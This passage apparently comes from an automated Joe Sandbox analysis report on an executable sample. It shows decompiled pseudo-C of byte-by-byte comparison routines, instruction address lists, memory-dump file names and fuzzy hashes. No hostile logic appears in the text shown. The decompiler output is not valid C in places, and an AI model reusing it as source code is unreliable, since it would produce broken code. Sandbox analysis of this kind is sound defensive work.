                  													if(_t309 != 0) {
                  														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  													}
                  													goto L81;
                  												}
                  												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  												if(_t309 != 0) {
                  													goto L1;
                  												}
                  												goto L78;
                  											}
                  											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L76;
                  										}
                  										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L74;
                  									}
                  									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                  									if(_t321 == 0) {
                  										L63:
                  										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L65:
                  											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L67:
                  												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                  												if(_t309 != 0) {
                  													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  												}
                  												goto L70;
                  											}
                  											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											goto L67;
                  										}
                  										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L65;
                  									}
                  									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L63;
                  								}
                  								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                  								if(_t328 == 0) {
                  									L52:
                  									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L54:
                  										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L56:
                  											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                  											if(_t309 != 0) {
                  												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  											}
                  											goto L59;
                  										}
                  										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										goto L56;
                  									}
                  									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L54;
                  								}
                  								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L52;
                  							}
                  							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                  							if(_t335 == 0) {
                  								L41:
                  								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L43:
                  									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L45:
                  										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                  										if(_t309 != 0) {
                  											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  										}
                  										goto L48;
                  									}
                  									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									goto L45;
                  								}
                  								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L43;
                  							}
                  							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L41;
                  						}
                  						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                  						if(_t342 == 0) {
                  							L30:
                  							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L32:
                  								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L34:
                  									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                  									if(_t309 != 0) {
                  										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  									}
                  									goto L37;
                  								}
                  								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								goto L34;
                  							}
                  							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L32;
                  						}
                  						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L30;
                  					}
                  					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                  					if(_t349 == 0) {
                  						L19:
                  						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L21:
                  							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L23:
                  								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                  								if(_t309 != 0) {
                  									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								}
                  								goto L26;
                  							}
                  							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							goto L23;
                  						}
                  						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						goto L21;
                  					}
                  					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					goto L19;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  					if(__esi == 0) {
                  						L8:
                  						__esi =  *(__eax - 0x1d) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  						if(__esi == 0) {
                  							L10:
                  							__esi =  *(__eax - 0x1c) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  							if(__esi == 0) {
                  								L12:
                  								__esi =  *(__eax - 0x1b) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L15;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L12;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L10;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L8;
                  				}
                  				L1:
                  				_t192 = _t309;
                  				goto L3;
                  			}
































                  0x0041465c
                  0x0041465c
                  0x00414662
                  0x004146e1
                  0x004146e3
                  0x004146e5
                  0x00000000
                  0x00000000
                  0x004146eb
                  0x004146f1
                  0x00414770
                  0x00414772
                  0x00414774
                  0x00000000
                  0x00000000
                  0x0041477a
                  0x00414780
                  0x004147ff
                  0x00414801
                  0x00414803
                  0x00000000
                  0x00000000
                  0x00414809
                  0x0041480f
                  0x0041488e
                  0x00414890
                  0x00414892
                  0x00000000
                  0x00000000
                  0x00414898
                  0x0041489e
                  0x0041491d
                  0x0041491f
                  0x00414921
                  0x00000000
                  0x00000000
                  0x0041492d
                  0x004149ad
                  0x004149af
                  0x004149b1
                  0x00000000
                  0x00000000
                  0x004149b7
                  0x004149bd
                  0x00414a3c
                  0x00414a3e
                  0x00414a40
                  0x00000000
                  0x00000000
                  0x00414a4e
                  0x00414248
                  0x0041424a
                  0x00414fa6
                  0x00414fa6
                  0x00414a5c
                  0x00414a5e
                  0x0041463a
                  0x00414642
                  0x00414644
                  0x00414655
                  0x00414655
                  0x00000000
                  0x00414644
                  0x00414a6b
                  0x00414a71
                  0x00414e8a
                  0x00000000
                  0x00414e8a
                  0x00000000
                  0x00414a77
                  0x004149c6
                  0x004149c8
                  0x004149df
                  0x004149e7
                  0x004149e9
                  0x00414a00
                  0x00414a08
                  0x00414a0a
                  0x00414a21
                  0x00414a29
                  0x00414a2b
                  0x00414a38
                  0x00414a38
                  0x00000000
                  0x00414a2b
                  0x00414a17
                  0x00414a1b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414a1b
                  0x004149f6
                  0x004149fa
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004149fa
                  0x004149d5
                  0x004149d9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004149d9
                  0x00414937
                  0x00414939
                  0x00414950
                  0x00414958
                  0x0041495a
                  0x00414971
                  0x00414979
                  0x0041497b
                  0x00414992
                  0x0041499a
                  0x0041499c
                  0x004149a9
                  0x004149a9
                  0x00000000
                  0x0041499c
                  0x00414988
                  0x0041498c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041498c
                  0x00414967
                  0x0041496b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041496b
                  0x00414946
                  0x0041494a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041494a
                  0x004148a7
                  0x004148a9
                  0x004148c0
                  0x004148c8
                  0x004148ca
                  0x004148e1
                  0x004148e9
                  0x004148eb
                  0x00414902
                  0x0041490a
                  0x0041490c
                  0x00414919
                  0x00414919
                  0x00000000
                  0x0041490c
                  0x004148f8
                  0x004148fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004148fc
                  0x004148d7
                  0x004148db
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004148db
                  0x004148b6
                  0x004148ba
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004148ba
                  0x00414818
                  0x0041481a
                  0x00414831
                  0x00414839
                  0x0041483b
                  0x00414852
                  0x0041485a
                  0x0041485c
                  0x00414873
                  0x0041487b
                  0x0041487d
                  0x0041488a
                  0x0041488a
                  0x00000000
                  0x0041487d
                  0x00414869
                  0x0041486d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041486d
                  0x00414848
                  0x0041484c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041484c
                  0x00414827
                  0x0041482b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041482b
                  0x00414789
                  0x0041478b
                  0x004147a2
                  0x004147aa
                  0x004147ac
                  0x004147c3
                  0x004147cb
                  0x004147cd
                  0x004147e4
                  0x004147ec
                  0x004147ee
                  0x004147fb
                  0x004147fb
                  0x00000000
                  0x004147ee
                  0x004147da
                  0x004147de
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004147de
                  0x004147b9
                  0x004147bd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004147bd
                  0x00414798
                  0x0041479c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041479c
                  0x004146fa
                  0x004146fc
                  0x00414713
                  0x0041471b
                  0x0041471d
                  0x00414734
                  0x0041473c
                  0x0041473e
                  0x00414755
                  0x0041475d
                  0x0041475f
                  0x0041476c
                  0x0041476c
                  0x00000000
                  0x0041475f
                  0x0041474b
                  0x0041474f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041474f
                  0x0041472a
                  0x0041472e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041472e
                  0x00414709
                  0x0041470d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414664
                  0x00414664
                  0x00414667
                  0x0041466b
                  0x0041466d
                  0x00414684
                  0x00414684
                  0x00414688
                  0x0041468c
                  0x0041468e
                  0x004146a5
                  0x004146a5
                  0x004146a9
                  0x004146ad
                  0x004146af
                  0x004146c6
                  0x004146c6
                  0x004146ca
                  0x004146ce
                  0x004146d0
                  0x004146d6
                  0x004146d9
                  0x004146dd
                  0x004146dd
                  0x00000000
                  0x004146d0
                  0x004146b5
                  0x004146b8
                  0x004146bc
                  0x004146c0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004146c0
                  0x00414694
                  0x00414697
                  0x0041469b
                  0x0041469f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041469f
                  0x00414673
                  0x00414676
                  0x0041467a
                  0x0041467e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041467e
                  0x00413e75
                  0x00413e75
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: e492689855932e246beed80518a5e0354f6c67d216bb37e94c6bc5de9dc4e9b7
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: DFD1BF73C0AAF34A8735852D40681BBEA626FD179131FC3E2CCE43F389D62A5D8196D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00414250(void* __eax, void* __ecx) {
                  				void* _t183;
                  				signed int _t184;
                  				void* _t187;
                  				signed char _t193;
                  				signed char _t194;
                  				signed char _t195;
                  				signed char _t196;
                  				signed char _t198;
                  				signed int _t296;
                  				void* _t299;
                  				void* _t301;
                  				void* _t303;
                  				void* _t306;
                  				void* _t308;
                  				void* _t310;
                  				void* _t313;
                  				void* _t315;
                  				void* _t317;
                  				void* _t320;
                  				void* _t322;
                  				void* _t324;
                  				void* _t327;
                  				void* _t329;
                  				void* _t331;
                  				void* _t334;
                  				void* _t336;
                  				void* _t338;
                  
                  				_t187 = __ecx;
                  				_t183 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                  					_t296 = 0;
                  					L12:
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					_t193 =  *(_t183 - 0x19);
                  					if(_t193 ==  *(_t187 - 0x19)) {
                  						_t296 = 0;
                  						L23:
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						_t194 =  *(_t183 - 0x15);
                  						if(_t194 ==  *(_t187 - 0x15)) {
                  							_t296 = 0;
                  							L34:
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							_t195 =  *(_t183 - 0x11);
                  							if(_t195 ==  *(_t187 - 0x11)) {
                  								_t296 = 0;
                  								L45:
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								_t196 =  *(_t183 - 0xd);
                  								if(_t196 ==  *(_t187 - 0xd)) {
                  									_t296 = 0;
                  									L56:
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                  										_t296 = 0;
                  										L67:
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										_t198 =  *(_t183 - 5);
                  										if(_t198 ==  *(_t187 - 5)) {
                  											_t296 = 0;
                  											L78:
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                  											if(_t184 != 0) {
                  												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                  											}
                  											L2:
                  											return _t184;
                  										}
                  										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                  										if(_t299 == 0) {
                  											L71:
                  											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                  											if(_t301 == 0) {
                  												L73:
                  												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                  												if(_t303 == 0) {
                  													L75:
                  													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                  													if(_t296 != 0) {
                  														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                  												if(_t296 != 0) {
                  													goto L1;
                  												}
                  												goto L75;
                  											}
                  											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L73;
                  										}
                  										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L71;
                  									}
                  									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                  									if(_t306 == 0) {
                  										L60:
                  										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                  										if(_t308 == 0) {
                  											L62:
                  											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                  											if(_t310 == 0) {
                  												L64:
                  												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                  												if(_t296 != 0) {
                  													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  												}
                  												goto L67;
                  											}
                  											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L64;
                  										}
                  										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L62;
                  									}
                  									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L60;
                  								}
                  								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                  								if(_t313 == 0) {
                  									L49:
                  									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                  									if(_t315 == 0) {
                  										L51:
                  										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                  										if(_t317 == 0) {
                  											L53:
                  											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                  											if(_t296 != 0) {
                  												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  											}
                  											goto L56;
                  										}
                  										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L53;
                  									}
                  									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L51;
                  								}
                  								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L49;
                  							}
                  							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                  							if(_t320 == 0) {
                  								L38:
                  								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                  								if(_t322 == 0) {
                  									L40:
                  									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                  									if(_t324 == 0) {
                  										L42:
                  										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                  										if(_t296 != 0) {
                  											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  										}
                  										goto L45;
                  									}
                  									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L42;
                  								}
                  								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L40;
                  							}
                  							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L38;
                  						}
                  						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                  						if(_t327 == 0) {
                  							L27:
                  							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                  							if(_t329 == 0) {
                  								L29:
                  								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                  								if(_t331 == 0) {
                  									L31:
                  									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                  									if(_t296 != 0) {
                  										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  									}
                  									goto L34;
                  								}
                  								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L31;
                  							}
                  							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L29;
                  						}
                  						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L27;
                  					}
                  					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                  					if(_t334 == 0) {
                  						L16:
                  						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                  						if(_t336 == 0) {
                  							L18:
                  							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                  							if(_t338 == 0) {
                  								L20:
                  								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                  								if(_t296 != 0) {
                  									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  								}
                  								goto L23;
                  							}
                  							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L20;
                  						}
                  						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L18;
                  					}
                  					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					goto L16;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  					if(__esi == 0) {
                  						L5:
                  						__esi =  *(__eax - 0x1c) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  						if(__esi == 0) {
                  							L7:
                  							__esi =  *(__eax - 0x1b) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  							if(__esi == 0) {
                  								L9:
                  								__esi =  *(__eax - 0x1a) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L12;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L9;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L7;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				_t184 = _t296;
                  				goto L2;
                  			}






























                  0x00414250
                  0x00414250
                  0x00414256
                  0x004142d5
                  0x004142d7
                  0x004142d9
                  0x00000000
                  0x00000000
                  0x004142df
                  0x004142e5
                  0x00414364
                  0x00414366
                  0x00414368
                  0x00000000
                  0x00000000
                  0x0041436e
                  0x00414374
                  0x004143f3
                  0x004143f5
                  0x004143f7
                  0x00000000
                  0x00000000
                  0x004143fd
                  0x00414403
                  0x00414482
                  0x00414484
                  0x00414486
                  0x00000000
                  0x00000000
                  0x0041448c
                  0x00414492
                  0x00414511
                  0x00414513
                  0x00414515
                  0x00000000
                  0x00000000
                  0x00414521
                  0x004145a1
                  0x004145a3
                  0x004145a5
                  0x00000000
                  0x00000000
                  0x004145ab
                  0x004145b1
                  0x00414630
                  0x00414632
                  0x00414634
                  0x00000000
                  0x00000000
                  0x00414642
                  0x00414644
                  0x00414655
                  0x00414655
                  0x0041424a
                  0x00414fa6
                  0x00414fa6
                  0x004145ba
                  0x004145bc
                  0x004145d3
                  0x004145db
                  0x004145dd
                  0x004145f4
                  0x004145fc
                  0x004145fe
                  0x00414615
                  0x0041461d
                  0x0041461f
                  0x0041462c
                  0x0041462c
                  0x00000000
                  0x0041461f
                  0x0041460b
                  0x0041460f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041460f
                  0x004145ea
                  0x004145ee
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004145ee
                  0x004145c9
                  0x004145cd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004145cd
                  0x0041452b
                  0x0041452d
                  0x00414544
                  0x0041454c
                  0x0041454e
                  0x00414565
                  0x0041456d
                  0x0041456f
                  0x00414586
                  0x0041458e
                  0x00414590
                  0x0041459d
                  0x0041459d
                  0x00000000
                  0x00414590
                  0x0041457c
                  0x00414580
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414580
                  0x0041455b
                  0x0041455f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041455f
                  0x0041453a
                  0x0041453e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041453e
                  0x0041449b
                  0x0041449d
                  0x004144b4
                  0x004144bc
                  0x004144be
                  0x004144d5
                  0x004144dd
                  0x004144df
                  0x004144f6
                  0x004144fe
                  0x00414500
                  0x0041450d
                  0x0041450d
                  0x00000000
                  0x00414500
                  0x004144ec
                  0x004144f0
                  0x00000000
